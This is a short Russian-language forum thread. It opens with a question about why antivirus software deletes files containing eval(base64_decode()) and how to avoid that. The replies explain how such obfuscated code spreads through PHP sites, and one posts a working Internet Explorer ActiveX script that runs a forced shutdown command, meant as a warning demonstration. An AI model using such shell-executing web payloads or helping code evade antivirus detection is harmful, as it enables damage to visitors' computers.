Как только антивирус видит eval(base64_decode()) сразу удаляет файл и говорит что это троян( Почему так? И как это избежать?
Так обычно всякую заразу в файлы включают. Закачешь такой файл на хост, запустишь, код вируса скопируется во все файлы с именем index.php и начнет вставлять javascript на страницу, и т.д.
запусти в IE: HTML: script> var WShell = new ActiveXObject("WScript.Shell"); WShell.Run( 'shutdown /s /t 30 /c "You PC must die after 30 sec!"' ); </script> <input type="button" value="Cancel" onClick="WShell.Run('shutdown /a');" /> ...а еще может всякие банеры грузить, которые будут открываться на всю страницу при клике на странице или перенаправлять пользователя на другой сайт.
ЗЫ интереса ради поставил команду notepad вместо shutdown и оно выполнилось : посему вывод : при виде такого окна нажимайте нет всегда!